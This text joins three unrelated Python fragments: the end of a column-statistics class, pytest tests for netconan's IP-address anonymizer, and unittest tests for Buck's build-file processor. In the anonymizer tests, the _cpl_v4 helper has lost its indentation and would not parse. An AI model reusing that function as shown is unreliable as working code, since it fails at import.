        self._header = header
        self._stats = [
            ColumnStat("Sum", sum),
            ColumnStat("Avg", lambda x: float(sum(x)) / float(len(x))),
            ColumnStat("Min", min),
            ColumnStat("Max", max),
            ColumnStat("NUL", lambda x: int(sum(map(lambda y: 1 if y is None else 0, x))), 0, True)
        ]
        # NULL-aware stats see the raw column; the rest see NULLs coerced to 0.
        without_nulls = list(map(lambda x: 0 if x is None else x, col))
        for stat in self._stats:
            if stat.handles_null:
                stat(col)
            else:
                stat(without_nulls)

    @property
    def stats(self):
        """Mapping of statistic label -> computed value."""
        return dict((c.label, c.value) for c in self._stats)

    def __str__(self):
        return str(self._header)
|
|
"""Test anonymization of IP addresses and related functions."""
# Copyright 2018 Intentionet
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import unicode_literals
import ipaddress
import re
import pytest
from netconan.ip_anonymization import IpAnonymizer, IpV6Anonymizer, anonymize_ip_addr
# IPv4 classful prefixes; preserving these keeps the leading class bits intact.
ip_v4_classes = [
    "0.0.0.0/1",  # Class A
    "128.0.0.0/2",  # Class B
    "192.0.0.0/3",  # Class C
    "224.0.0.0/4",  # Class D (implies class E)
]
# Assorted IPv4 test addresses, including zero-padded octets and high classes.
# (Redundant parentheses around each literal removed: they suggested 1-tuples
# but were plain strings.)
ip_v4_list = [
    "12.13.14.15",
    "237.73.212.5",
    "123.45.67.89",
    "92.210.0.255",
    "128.7.55.12",
    "223.123.21.99",
    "193.99.99.99",
    "225.99.99.99",
    "241.99.99.99",
    "249.99.99.99",
    "254.254.254.254",
    "009.010.011.012",
    "1.2.3.0000014",
]
# Assorted IPv6 test addresses covering compressed and mixed-case forms.
ip_v6_list = [
    "1234::5678",
    "::1",
    "1::",
    "1::1",
    "2001:db8:85a3:7:8:8a2e:370:7334",
    "2001:db8:a0b:12f0::1",
    "ffff:ffff::ffff:ffff",
    "a:b:c:d:e:f:1:2",
    "aAaA:bBbB:cCcC:dDdD:eEeE:fFfF:1010:2929",
    "ffff:eeee:dddd:cccc:bbbb:AaAa:9999:8888",
]
# Private-use blocks defined at https://www.iana.org/assignments/iana-ipv4-special-registry/iana-ipv4-special-registry.xhtml
# Tuples consist of: start of block, end of block, block subnet
private_blocks = [
    ("10.0.0.0", "10.255.255.255", "10.0.0.0/8"),
    ("172.16.0.0", "172.31.255.255", "172.16.0.0/12"),
    ("192.168.0.0", "192.168.255.255", "192.168.0.0/16"),
]
# Fixed salt so anonymization is deterministic across the test module.
SALT = "saltForTest"
@pytest.fixture(scope="module")
def anonymizer_v4():
    """Shared IPv4 anonymizer reused by most tests in this module."""
    return IpAnonymizer(SALT)
@pytest.fixture(scope="module")
def anonymizer_v4_preserving_host_bits():
    """IPv4 anonymizer configured to leave the 8 low (host) bits untouched."""
    return IpAnonymizer(SALT, preserve_suffix=8)
@pytest.fixture(scope="module")
def anonymizer_v6():
    """Shared IPv6 anonymizer reused by every v6 test in this module."""
    return IpV6Anonymizer(SALT)
@pytest.fixture(scope="module")
def anonymizer(request):
    """Build the anonymizer named by the (indirect) parametrize parameter."""
    factories = {
        "v4": lambda: IpAnonymizer(SALT),
        "v6": lambda: IpV6Anonymizer(SALT),
        "flipv4": lambda: IpAnonymizer(SALT, salter=lambda a, b: 1),
    }
    if request.param not in factories:
        raise ValueError("Invalid anonymizer type {}".format(request.param))
    return factories[request.param]()
@pytest.fixture(scope="module")
def flip_anonymizer_v4():
    """Anonymizer whose constant salter flips every non-class bit."""
    # Private blocks are deliberately not preserved: preserving them would
    # pin additional bits and reduce how many get flipped.
    return IpAnonymizer(SALT, preserve_prefixes=ip_v4_classes, salter=lambda a, b: 1)
def anonymize_line_general(anonymizer, line, ip_addrs):
    """Check whole-line anonymization against per-address anonymization."""
    original_line = line.format(*ip_addrs)
    anon_line = anonymize_ip_addr(anonymizer, original_line)
    # Anonymize each address on its own and rebuild the line from the pieces.
    rebuilt_line = line.format(
        *[anonymize_ip_addr(anonymizer, addr) for addr in ip_addrs]
    )
    # Anonymizing the whole line must agree with anonymizing piecewise.
    assert anon_line == rebuilt_line
    # None of the original addresses may survive in the anonymized line.
    for addr in ip_addrs:
        assert addr not in anon_line
@pytest.mark.parametrize(
    "line, ip_addrs",
    [
        ("ip address {} 255.255.255.254", ["123.45.67.89"]),
        ("ip address {} 255.0.0.0", ["10.0.0.0"]),
        ("ip address {}/16", ["10.0.0.0"]),
        ("tacacs-server host {}", ["10.1.1.17"]),
        ("tacacs-server host {}", ["001.021.201.012"]),
        ("syscon address {} Password", ["10.73.212.5"]),
        ("1 permit tcp host {} host {} eq 2", ["1.2.3.4", "1.2.3.45"]),
        ("1 permit tcp host {} host {} eq 2", ["1.2.123.4", "11.2.123.4"]),
        ("1 permit tcp host {} host {} eq 2", ["1.2.30.45", "1.2.30.4"]),
        ("1 permit tcp host {} host {} eq 2", ["11.20.3.4", "1.20.3.4"]),
        ("something host {} host {} host {}", ["1.2.3.4", "1.2.3.5", "1.2.3.45"]),
        # These formats may occur in Batfish output
        ('"{}"', ["1.2.3.45"]),
        ("({})", ["1.2.3.45"]),
        ("[IP addresses:{},{}]", ["1.2.3.45", "1.2.3.5"]),
        ("flow:{}->{}", ["1.2.3.45", "1.2.3.5"]),
        ("something={}", ["1.2.3.45"]),
        ("something <{}>", ["1.2.3.45"]),
        ("something '{}'", ["1.2.3.45"]),
    ],
)
def test_v4_anonymize_line(anonymizer_v4, line, ip_addrs):
    """Test IPv4 address removal from config lines."""
    # Each case formats the addresses into the template; the shared helper
    # checks both line/per-address consistency and original-address removal.
    anonymize_line_general(anonymizer_v4, line, ip_addrs)
@pytest.mark.parametrize("enclosing", "_:;[]$~!@#$%^&*()-+=[]|<>?")
def test_v4_anonymize_enclosed_addr(anonymizer_v4, enclosing):
    """IPv4 anonymization must still work when punctuation hugs the address."""
    template = enclosing + "{}" + enclosing
    anonymize_line_general(anonymizer_v4, template, ["1.2.3.4"])
@pytest.mark.parametrize(
    "line, ip_addrs",
    [
        ("ip address {} something::something", ["1234::5678"]),
        ("ip address {} blah {}", ["1234::", "1234:5678::9abc:def0"]),
        ("ip address {} blah {} blah", ["::1", "1234:5678:abcd:dcba::9abc:def0"]),
        ("ip address {}/16 blah", ["::1"]),
        ("ip address {}/16 blah", ["1::"]),
        ("ip address {}/16 blah", ["1::1"]),
        ("ip address {}/16 blah", ["ffff:ffff::ffff:ffff"]),
    ],
)
def test_v6_anonymize_line(anonymizer_v6, line, ip_addrs):
    """Test IPv6 address removal from config lines."""
    # Delegates to the generic helper shared with the IPv4 tests.
    anonymize_line_general(anonymizer_v6, line, ip_addrs)
@pytest.mark.parametrize("enclosing", ".;[]$~!@#$%^&*()-+=[]|<>?")
def test_v6_anonymize_enclosed_addr(anonymizer_v6, enclosing):
    """IPv6 anonymization must still work when punctuation hugs the address."""
    template = enclosing + "{}" + enclosing
    anonymize_line_general(anonymizer_v6, template, ["1::1"])
def get_ip_v4_class(ip_int):
    """Return the classful-network letter (A-E) for an IPv4 address integer."""
    # Classes are identified purely by the leading bits: 0 -> A, 10 -> B,
    # 110 -> C, 1110 -> D, 1111 -> E.  Test from the shortest prefix down.
    if not ip_int & 0x80000000:
        return "A"
    if (ip_int & 0xC0000000) == 0x80000000:
        return "B"
    if (ip_int & 0xE0000000) == 0xC0000000:
        return "C"
    if (ip_int & 0xF0000000) == 0xE0000000:
        return "D"
    return "E"
def get_ip_v4_class_mask(ip_int):
    """Return a mask of the bits pinned when the IPv4 class is preserved."""
    # Most specific class first (E has four fixed leading bits), falling back
    # through D/C/B; anything else only has the top (class A) bit pinned.
    for prefix, mask in (
        (0xE0000000, 0xF0000000),
        (0xC0000000, 0xE0000000),
        (0x80000000, 0xC0000000),
    ):
        if (ip_int & prefix) == prefix:
            return mask
    return 0x80000000
@pytest.mark.parametrize(
    "ip_addr",
    [
        "0.0.0.0",
        "127.255.255.255",  # Class A
        "128.0.0.0",
        "191.255.255.255",  # Class B
        "192.0.0.0",
        "223.255.255.255",  # Class C
        "224.0.0.0",
        "239.255.255.255",  # Class D
        "240.0.0.0",
        "247.255.255.255",  # Class E
    ],
)
def test_v4_class_preserved(flip_anonymizer_v4, ip_addr):
    """Test that IPv4 classes are preserved."""
    # The fixture's salter always returns 1, so every bit the anonymizer is
    # allowed to change must flip; only the class prefix bits may survive.
    ip_int = int(flip_anonymizer_v4.make_addr(ip_addr))
    ip_int_anon = flip_anonymizer_v4.anonymize(ip_int)
    # IP v4 class should match after anonymization
    assert get_ip_v4_class(ip_int) == get_ip_v4_class(ip_int_anon)
    # Anonymized ip address should not match the original ip address
    assert ip_int != ip_int_anon
    # All bits that are not forced to be preserved are flipped
    class_mask = get_ip_v4_class_mask(ip_int)
    assert 0xFFFFFFFF ^ class_mask == ip_int ^ ip_int_anon
def test_preserve_custom_prefixes():
    """A caller-supplied prefix must be preserved by the anonymizer."""
    subnet = "170.0.0.0/8"
    anonymizer = IpAnonymizer(SALT, [subnet])
    network = ipaddress.ip_network(subnet)
    # Check both edges of the preserved block.
    for addr in ("170.0.0.0", "170.255.255.255"):
        original = int(anonymizer.make_addr(addr))
        anonymized = anonymizer.anonymize(original)
        # The address itself must change ...
        assert anonymized != original
        # ... but it must remain inside the preserved /8.
        assert ipaddress.ip_address(anonymized) in network
def test_preserve_custom_addresses():
    """Addresses inside a preserved block must be flagged as not-to-anonymize."""
    anonymizer = IpAnonymizer(SALT, preserve_addresses=["170.0.0.0/8", "11.11.11.11"])
    # Block edges and the individually preserved address must be left alone.
    for preserved in ("170.0.0.0", "170.255.255.255", "11.11.11.11"):
        assert not anonymizer.should_anonymize(int(anonymizer.make_addr(preserved)))
    # Anything outside the preserved set still gets anonymized.
    assert anonymizer.should_anonymize(int(anonymizer.make_addr("10.11.12.13")))
def test_preserve_address_preserves_prefix():
    """Preserving an address must not break prefix preservation for neighbors."""
    preserved_str = "11.11.11.11"
    preserved = ipaddress.ip_address(preserved_str)
    preserved_int = int(preserved)
    anonymizer = IpAnonymizer(SALT, preserve_addresses=[preserved_str])
    for bit in range(preserved.max_prefixlen):
        # Take the original address with exactly one bit flipped ...
        neighbor = ipaddress.ip_address(preserved_int ^ (1 << bit))
        neighbor_anon = ipaddress.ip_address(anonymizer.anonymize(int(neighbor)))
        # ... its common-prefix length with the preserved address must be
        # the same before and after anonymization.
        assert _cpl_v4(neighbor_anon, preserved) == _cpl_v4(neighbor, preserved)
def _cpl_v4(left, right):
"""
Return the common prefix length for two IPv4 addresses.
e.g.
_cpl_v4(1.0.0.1, 1.0.0.1) == 32
_cpl_v4(1.0.0.1, 1.0.128.1) == 16
_cpl_v4(1.0.0.1, 128.0.0.1) == 0
"""
xor = int(left) ^ int(right)
max_shift = 32
for i in reversed(range(max_shift)):
if xor & (0x1 << i):
return max_shift - 1 - i
return max_shift
@pytest.mark.parametrize("start, end, subnet", private_blocks)
def test_preserve_private_prefixes(anonymizer_v4, start, end, subnet):
    """Private-use prefixes must be preserved by the default anonymizer."""
    network = ipaddress.ip_network(subnet)
    # Both edges of the private block must map back into the same block.
    for addr in (start, end):
        anonymized = anonymizer_v4.anonymize(int(anonymizer_v4.make_addr(addr)))
        assert ipaddress.ip_address(anonymized) in network
@pytest.mark.parametrize("length", range(0, 33))
def test_preserve_host_bits(length):
    """Host-bit preservation must hold for every possible suffix length."""
    # A constant salter of 1 flips every bit the anonymizer may touch.
    anonymizer = IpAnonymizer(
        salt=SALT, salter=lambda a, b: 1, preserve_suffix=length, preserve_prefixes=[]
    )
    anonymized = anonymizer.anonymize(0)
    # The high (32 - length) bits flip to 1; the preserved low bits stay 0.
    assert "{:032b}".format(anonymized) == "1" * (32 - length) + "0" * length
    # Deanonymization flips those bits back to the original address.
    assert anonymizer.deanonymize(anonymized) == 0
@pytest.mark.parametrize(
    "anonymizer,ip_addr",
    [("v4", s) for s in ip_v4_list] + [("v6", s) for s in ip_v6_list],
    indirect=["anonymizer"],
)
def test_anonymize_addr(anonymizer, ip_addr):
    """Test conversion from original to anonymized IP address."""
    # Core invariant: anonymization must preserve exactly the bits two
    # addresses have in common (prefix-preserving) while changing the rest.
    ip_int = int(anonymizer.make_addr(ip_addr))
    ip_int_anon = anonymizer.anonymize(ip_int)
    # Anonymized ip address should not match the original address
    assert ip_int != ip_int_anon
    full_bit_mask = (1 << anonymizer.length) - 1
    # Confirm prefixes for similar addresses are preserved after anonymization
    for i in range(0, anonymizer.length):
        # Flip the ith bit of the org address and use that as the similar address
        diff_mask = 1 << i
        ip_int_similar = ip_int ^ diff_mask
        ip_int_similar_anon = anonymizer.anonymize(ip_int_similar)
        # Using i + 1 since same_mask should mask off ith bit, not preserve it
        same_mask = full_bit_mask & (full_bit_mask << (i + 1))
        # Common prefix for addresses should match after anonymization
        assert ip_int_similar_anon & same_mask == ip_int_anon & same_mask
        # Confirm the bit that is different in the original addresses is different in the anonymized addresses
        assert ip_int_similar_anon & diff_mask != ip_int_anon & diff_mask
def test_anonymize_ip_order_independent():
    """Test to make sure order does not affect anonymization of addresses."""
    # Baseline: anonymize the list in its given order and remember the mapping.
    anonymizer_v4_forward = IpAnonymizer(SALT)
    ip_lookup_forward = {}
    for ip_addr in ip_v4_list:
        ip_int = int(anonymizer_v4_forward.make_addr(ip_addr))
        ip_int_anon = anonymizer_v4_forward.anonymize(ip_int)
        ip_lookup_forward[ip_int] = ip_int_anon
    # A fresh anonymizer fed the same addresses in reverse must agree.
    anonymizer_v4_reverse = IpAnonymizer(SALT)
    for ip_addr in reversed(ip_v4_list):
        ip_int_reverse = int(anonymizer_v4_reverse.make_addr(ip_addr))
        ip_int_anon_reverse = anonymizer_v4_reverse.anonymize(ip_int_reverse)
        # Confirm anonymizing in reverse order does not affect
        # anonymization results
        assert ip_int_anon_reverse == ip_lookup_forward[ip_int_reverse]
    # A fresh anonymizer that also sees unrelated (bit-inverted) addresses
    # interleaved between the originals must still agree.
    anonymizer_v4_extras = IpAnonymizer(SALT)
    for ip_addr in ip_v4_list:
        ip_int_extras = int(anonymizer_v4_extras.make_addr(ip_addr))
        ip_int_anon_extras = anonymizer_v4_extras.anonymize(ip_int_extras)
        ip_int_inverted = ip_int_extras ^ 0xFFFFFFFF
        anonymizer_v4_extras.anonymize(ip_int_inverted)
        # Confirm anonymizing with extra addresses in-between does not
        # affect anonymization results
        assert ip_int_anon_extras == ip_lookup_forward[ip_int_extras]
@pytest.mark.parametrize("ip_addr", ip_v4_list)
def test_deanonymize_ip(anonymizer_v4, ip_addr):
    """anonymize followed by deanonymize must be the identity."""
    original = int(anonymizer_v4.make_addr(ip_addr))
    round_tripped = anonymizer_v4.deanonymize(anonymizer_v4.anonymize(original))
    assert round_tripped == original
def test_dump_iptree(tmpdir, anonymizer_v4):
    """Test ability to accurately dump IP address anonymization mapping."""
    ip_mapping = {}
    ip_mapping_from_dump = {}
    # Make sure all addresses to be checked are in ip_tree and generate
    # the reference mapping (original address -> anonymized address).
    for ip_addr_raw in ip_v4_list:
        ip_addr = anonymizer_v4.make_addr(ip_addr_raw)
        ip_int = int(ip_addr)
        ip_int_anon = anonymizer_v4.anonymize(ip_int)
        ip_addr_anon = str(ipaddress.IPv4Address(ip_int_anon))
        ip_mapping[str(ip_addr)] = ip_addr_anon
    filename = str(tmpdir.mkdir("test").join("test_dump_iptree.txt"))
    with open(filename, "w") as f_tmp:
        anonymizer_v4.dump_to_file(f_tmp)
    with open(filename, "r") as f_tmp:
        # Build mapping dict from the output of the ip_tree dump.
        for line in f_tmp.readlines():
            # All dots are escaped; the original pattern left two dots per
            # address unescaped, so '.' could match any character.
            m = re.match(r"\s*(\d+\.\d+\.\d+\.\d+)\s+(\d+\.\d+\.\d+\.\d+)\s*", line)
            ip_addr = m.group(1)
            ip_addr_anon = m.group(2)
            ip_mapping_from_dump[ip_addr] = ip_addr_anon
    for ip_addr in ip_mapping:
        # Confirm anon addresses from ip_tree dump match anon addresses from _convert_to_anon_ip
        assert ip_mapping[ip_addr] == ip_mapping_from_dump[ip_addr]
def test_dump_iptree_preserving_host_bits(tmpdir, anonymizer_v4_preserving_host_bits):
    """Test IP address anonymization map-dump, when preserving host bits."""
    ip_map_ref = {}
    ip_map_from_dump = {}
    # Build reference map (original address -> anonymized address).
    for ip_addr_raw in ip_v4_list:
        ip_addr = anonymizer_v4_preserving_host_bits.make_addr(ip_addr_raw)
        ip_int_anon = anonymizer_v4_preserving_host_bits.anonymize(int(ip_addr))
        ip_addr_anon = str(ipaddress.IPv4Address(ip_int_anon))
        ip_map_ref[str(ip_addr)] = ip_addr_anon
    # Build mapping dict from the output of the ip_tree dump text file.
    filename = str(tmpdir.mkdir("test").join("test_dump_iptree.txt"))
    with open(filename, "w") as f_tmp:
        anonymizer_v4_preserving_host_bits.dump_to_file(f_tmp)
    with open(filename, "r") as f_tmp:
        for line in f_tmp.readlines():
            # All dots are escaped; the original pattern left two dots per
            # address unescaped, so '.' could match any character.
            m = re.match(r"\s*(\d+\.\d+\.\d+\.\d+)\s+(\d+\.\d+\.\d+\.\d+)\s*", line)
            ip_addr = m.group(1)
            ip_addr_anon = m.group(2)
            ip_map_from_dump[ip_addr] = ip_addr_anon
    # Confirm dumped text map lines up with expected/reference map.
    for ip_addr in ip_map_ref:
        assert ip_map_ref[ip_addr] == ip_map_from_dump[ip_addr]
@pytest.mark.parametrize(
    "line",
    [
        "01:23:45:67:89:ab",
        "01:02:03:04:05:06:07:08:09",
        "01:02:03:04::05:06:07:08",
        "1.2.3.4.example.net",
        "1.2.3.4something.example.net",
        "a.1.2.3.4",
        "1.2.3",
        "1.2.3.4.5",
        "something1::abc",
        "123::ABsomething",
        "1.2.333.4",
        "1.2.0333.4",
        "1.256.3.4",
    ],
)
def test_false_positives(anonymizer_v4, anonymizer_v6, line):
    """Text that does not contain a valid address must pass through unchanged."""
    # Run the line through the v4 anonymizer, then the v6 anonymizer.
    processed = anonymize_ip_addr(anonymizer_v4, line)
    processed = anonymize_ip_addr(anonymizer_v6, processed)
    assert processed == line
@pytest.mark.parametrize(
    "zeros, no_zeros",
    [
        ("0.0.0.0", "0.0.0.0"),
        ("0.0.0.3", "0.0.0.3"),
        ("128.0.0.0", "128.0.0.0"),
        ("0.127.0.0", "0.127.0.0"),
        ("10.73.212.5", "10.73.212.5"),
        ("010.73.212.05", "10.73.212.5"),
        ("255.255.255.255", "255.255.255.255"),
        ("170.255.85.1", "170.255.85.1"),
        ("10.11.12.13", "10.11.12.13"),
        ("010.11.12.13", "10.11.12.13"),
        ("10.011.12.13", "10.11.12.13"),
        ("10.11.012.13", "10.11.12.13"),
        ("10.11.12.013", "10.11.12.13"),
        ("010.0011.00000012.000", "10.11.12.0"),
    ],
)
def test_v4_anonymizer_ignores_leading_zeros(anonymizer_v4, zeros, no_zeros):
    """v4 octets with leading zeros are read as decimal, never as octal."""
    parsed = anonymizer_v4.make_addr(zeros)
    assert parsed == ipaddress.IPv4Address(no_zeros)
@pytest.mark.parametrize(
    "ip_int, expected",
    [
        (0b00000000000000000000000000000000, False),
        (0b00000000000000000000000000000001, False),
        (0b00000000000000000000000000001111, False),
        (0b11110000000000000000000000000000, False),
        (0b10000000000000000000000000000000, False),
        (0b01111111111000000000000000000000, True),
        (0b00000011111000000000000000000000, True),
        (0b00000000000100000000000000000000, True),
        (0b00010101001001000000000000000000, True),
        (0b00000000000000000010000000000000, True),
        (0b00000000000000000011111111111110, True),
        (0b00000000010000000100000000000000, True),
    ],
)
def test_v4_should_anonymize(anonymizer_v4, ip_int, expected):
    """Mask-like bit patterns must be left alone by the IPv4 anonymizer."""
    assert anonymizer_v4.should_anonymize(ip_int) == expected
|
|
import __builtin__
import os
import unittest
import shutil
import tempfile
from .buck import BuildFileProcessor, DiagnosticMessageAndLevel, add_rule
def foo_rule(name, srcs=None, visibility=None, build_env=None):
    """Fake build rule used by the tests; registers a 'foo' rule via add_rule().

    The srcs/visibility defaults were mutable lists shared across calls;
    use None sentinels and substitute a fresh empty list instead.
    """
    add_rule({
        'buck.type': 'foo',
        'name': name,
        'srcs': srcs if srcs is not None else [],
        'visibility': visibility if visibility is not None else [],
    }, build_env)
def get_config_from_results(results):
    """Return the '__configs' payload from a list of processing results.

    Each result is a dict; the configs record is the one whose only key is
    '__configs'. Raises ValueError (with the full results) if none exists.
    """
    for result in results:
        # list() makes the comparison work on both Python 2 (keys() is a
        # list) and Python 3 (keys() is a view, never equal to a list).
        if list(result.keys()) == ['__configs']:
            return result['__configs']
    raise ValueError(str(results))
class ProjectFile(object):
    """Describes one file (path plus contents) inside the fake project tree."""

    def __init__(self, path, contents):
        # A sequence of lines is flattened into a single string terminated
        # by the platform line separator.
        if isinstance(contents, (tuple, list)):
            contents = os.linesep.join(contents) + os.linesep
        self.path = path
        self.name = '//{0}'.format(path)
        self.contents = contents
class BuckTest(unittest.TestCase):
    """Tests for BuildFileProcessor, run against a throwaway project tree."""

    def setUp(self):
        # Every test gets a fresh temporary project root to write files into.
        self.project_root = tempfile.mkdtemp()
        self.allow_empty_globs = False
        self.build_file_name = 'BUCK'
        self.watchman_client = None
        self.watchman_error = None

    def tearDown(self):
        # ignore_errors=True: best-effort cleanup of the temporary tree.
        shutil.rmtree(self.project_root, True)

    def write_file(self, pfile):
        """Write a ProjectFile's contents beneath the project root."""
        with open(os.path.join(self.project_root, pfile.path), 'w') as f:
            f.write(pfile.contents)

    def write_files(self, *pfiles):
        for pfile in pfiles:
            self.write_file(pfile)

    def create_build_file_processor(self, *includes, **kwargs):
        """Build a BuildFileProcessor wired to this test's project root."""
        return BuildFileProcessor(
            self.project_root,
            self.project_root,  # watchman_watch_root
            None,  # watchman_project_prefix
            self.build_file_name,
            self.allow_empty_globs,
            False,  # ignore_buck_autodeps_files
            self.watchman_client,
            self.watchman_error,
            includes,
            **kwargs)

    def test_sibling_includes_use_separate_globals(self):
        """
        Test that consecutive includes can't see each others globals.
        If a build file includes two include defs, one after another, verify
        that the first's globals don't pollute the second's (e.g. the second
        cannot implicitly reference globals from the first without including
        it itself).
        """
        # Setup the includes defs. The first one defines a variable that the
        # second one (incorrectly) implicitly references.
        include_def1 = ProjectFile(path='inc_def1', contents=('FOO = 1',))
        include_def2 = ProjectFile(path='inc_def2', contents=('BAR = FOO',))
        self.write_files(include_def1, include_def2)
        # Construct a processor using the above as default includes, and verify
        # that the second one can't use the first's globals.
        build_file = ProjectFile(path='BUCK', contents='')
        self.write_file(build_file)
        build_file_processor = self.create_build_file_processor(
            include_def1.name,
            include_def2.name)
        self.assertRaises(
            NameError,
            build_file_processor.process,
            build_file.path, set())
        # Construct a processor with no default includes, have a generated
        # build file include the include defs one after another, and verify
        # that the second one can't use the first's globals.
        build_file = ProjectFile(
            path='BUCK',
            contents=(
                'include_defs({0!r})'.format(include_def1.name),
                'include_defs({0!r})'.format(include_def2.name),
            ))
        self.write_file(build_file)
        build_file_processor = self.create_build_file_processor()
        self.assertRaises(
            NameError,
            build_file_processor.process,
            build_file.path, set())

    def test_lazy_include_defs(self):
        """
        Tests bug reported in https://github.com/facebook/buck/issues/182.
        If an include def references another include def via a lazy
        include_defs call in some defined function, verify that it can
        correctly access the latter's globals after the import.
        """
        # Setup the includes defs. The first one defines a variable that the
        # second one references after a local 'include_defs' call.
        include_def1 = ProjectFile(path='inc_def1', contents=('FOO = 1',))
        include_def2 = ProjectFile(
            path='inc_def2',
            contents=(
                'def test():',
                '    include_defs({0!r})'.format(include_def1.name),
                '    FOO',
            ))
        self.write_files(include_def1, include_def2)
        # Construct a processor using the above as default includes, and verify
        # that the function 'test' can use 'FOO' after including the first
        # include def.
        build_file = ProjectFile(path='BUCK', contents=('test()',))
        self.write_file(build_file)
        build_file_processor = self.create_build_file_processor(
            include_def1.name,
            include_def2.name)
        build_file_processor.process(build_file.path, set())
        # Construct a processor with no default includes, have a generated
        # build file include the include defs one after another, and verify
        # that the function 'test' can use 'FOO' after including the first
        # include def.
        build_file = ProjectFile(
            path='BUCK',
            contents=(
                'include_defs({0!r})'.format(include_def1.name),
                'include_defs({0!r})'.format(include_def2.name),
                'test()',
            ))
        self.write_file(build_file)
        build_file_processor = self.create_build_file_processor()
        build_file_processor.process(build_file.path, set())

    def test_private_globals_are_ignored(self):
        """
        Verify globals prefixed with '_' don't get imported via 'include_defs'.
        """
        include_def = ProjectFile(path='inc_def1', contents=('_FOO = 1',))
        self.write_file(include_def)
        # Test we don't get private module attributes from default includes.
        build_file = ProjectFile(path='BUCK', contents=('_FOO',))
        self.write_file(build_file)
        build_file_processor = self.create_build_file_processor(
            include_def.name)
        self.assertRaises(
            NameError,
            build_file_processor.process,
            build_file.path, set())
        # Test we don't get private module attributes from explicit includes.
        build_file = ProjectFile(
            path='BUCK',
            contents=(
                'include_defs({0!r})'.format(include_def.name),
                '_FOO',
            ))
        self.write_file(build_file)
        build_file_processor = self.create_build_file_processor()
        self.assertRaises(
            NameError,
            build_file_processor.process,
            build_file.path, set())

    def test_implicit_includes_apply_to_explicit_includes(self):
        """
        Verify that implicit includes are applied to explicit includes.
        """
        # Setup an implicit include that defines a variable, another include
        # that uses it, and a build file that uses the explicit include.
        implicit_inc = ProjectFile(path='implicit', contents=('FOO = 1',))
        explicit_inc = ProjectFile(path='explicit', contents=('FOO',))
        build_file = ProjectFile(
            path='BUCK',
            contents=(
                'include_defs({0!r})'.format(explicit_inc.name),
            ))
        self.write_files(implicit_inc, explicit_inc, build_file)
        # Run the processor to verify that the explicit include can use the
        # variable in the implicit include.
        build_file_processor = self.create_build_file_processor(
            implicit_inc.name)
        build_file_processor.process(build_file.path, set())

    def test_all_list_is_respected(self):
        """
        Verify that the `__all__` list in included files can be used to narrow
        what gets pulled in.
        """
        include_def = ProjectFile(
            path='inc_def1',
            contents=('__all__ = []', 'FOO = 1'))
        self.write_file(include_def)
        # Test we don't get non-whitelisted attributes from default includes.
        build_file = ProjectFile(path='BUCK', contents=('FOO',))
        self.write_file(build_file)
        build_file_processor = self.create_build_file_processor(
            include_def.name)
        self.assertRaises(
            NameError,
            build_file_processor.process,
            build_file.path, set())
        # Test we don't get non-whitelisted attributes from explicit includes.
        build_file = ProjectFile(
            path='BUCK',
            contents=(
                'include_defs({0!r})'.format(include_def.name),
                'FOO',
            ))
        self.write_file(build_file)
        build_file_processor = self.create_build_file_processor()
        self.assertRaises(
            NameError,
            build_file_processor.process,
            build_file.path, set())

    def test_do_not_override_overridden_builtins(self):
        """
        We want to ensure that if you override something like java_binary, and then use
        include_defs to get another file, you don't end up clobbering your override.
        """
        # Override java_library and have it automatically add a dep
        build_defs = ProjectFile(
            path='BUILD_DEFS',
            contents=(
                # While not strictly needed for this test, we want to make sure we are overriding
                # a provided method and not just defining it ourselves.
                'old_get_base_path = get_base_path',
                'def get_base_path(*args, **kwargs):',
                '  raise ValueError()',
                'include_defs("//OTHER_DEFS")',
            ))
        other_defs = ProjectFile(path='OTHER_DEFS', contents=())
        build_file = ProjectFile(
            path='BUCK',
            contents=(
                'get_base_path()',
            ))
        self.write_files(build_defs, other_defs, build_file)
        build_file_processor = self.create_build_file_processor(build_defs.name)
        build_file_processor.install_builtins(__builtin__.__dict__)
        self.assertRaises(
            ValueError,
            build_file_processor.process,
            build_file.path, set())

    def test_watchman_glob_failure_falls_back_to_regular_glob_and_adds_diagnostic(self):
        class FakeWatchmanError(Exception):
            pass

        class FakeWatchmanClient:
            # Fixed: this was previously named FakeWatchmanClient (same as
            # the class), so it was never invoked as a constructor.
            def __init__(self):
                self.query_invoked = False

            def query(self, *args):
                self.query_invoked = True
                raise FakeWatchmanError("whoops")

            def close(self):
                pass

        self.watchman_client = FakeWatchmanClient()
        self.watchman_error = FakeWatchmanError
        build_file = ProjectFile(
            path='BUCK',
            contents=(
                'foo_rule(',
                ' name="foo",'
                ' srcs=glob(["*.java"]),',
                ')'
            ))
        java_file = ProjectFile(path='Foo.java', contents=())
        self.write_files(build_file, java_file)
        build_file_processor = self.create_build_file_processor(extra_funcs=[foo_rule])
        build_file_processor.install_builtins(__builtin__.__dict__)
        diagnostics = set()
        rules = build_file_processor.process(build_file.path, diagnostics)
        self.assertTrue(self.watchman_client.query_invoked)
        self.assertEqual(['Foo.java'], rules[0]['srcs'])
        self.assertEqual(
            set([DiagnosticMessageAndLevel(
                'Watchman error, falling back to slow glob: whoops',
                'error')]),
            diagnostics)

    def test_watchman_glob_warning_adds_diagnostic(self):
        class FakeWatchmanClient:
            def query(self, *args):
                return {'warning': 'This is a warning', 'files': ['Foo.java']}

            def close(self):
                pass

        self.watchman_client = FakeWatchmanClient()
        build_file = ProjectFile(
            path='BUCK',
            contents=(
                'foo_rule(',
                ' name="foo",'
                ' srcs=glob(["*.java"]),',
                ')'
            ))
        java_file = ProjectFile(path='Foo.java', contents=())
        self.write_files(build_file, java_file)
        build_file_processor = self.create_build_file_processor(extra_funcs=[foo_rule])
        build_file_processor.install_builtins(__builtin__.__dict__)
        diagnostics = set()
        rules = build_file_processor.process(build_file.path, diagnostics)
        self.assertEqual(['Foo.java'], rules[0]['srcs'])
        self.assertEqual(
            set([DiagnosticMessageAndLevel('Watchman warning: This is a warning', 'warning')]),
            diagnostics)

    def test_read_config(self):
        """
        Verify that the builtin `read_config()` function works.
        """
        build_file = ProjectFile(
            path='BUCK',
            contents=(
                'assert read_config("hello", "world") == "foo"',
                'assert read_config("hello", "bar") is None',
                'assert read_config("hello", "goo", "default") == "default"',
            ))
        self.write_file(build_file)
        build_file_processor = self.create_build_file_processor(
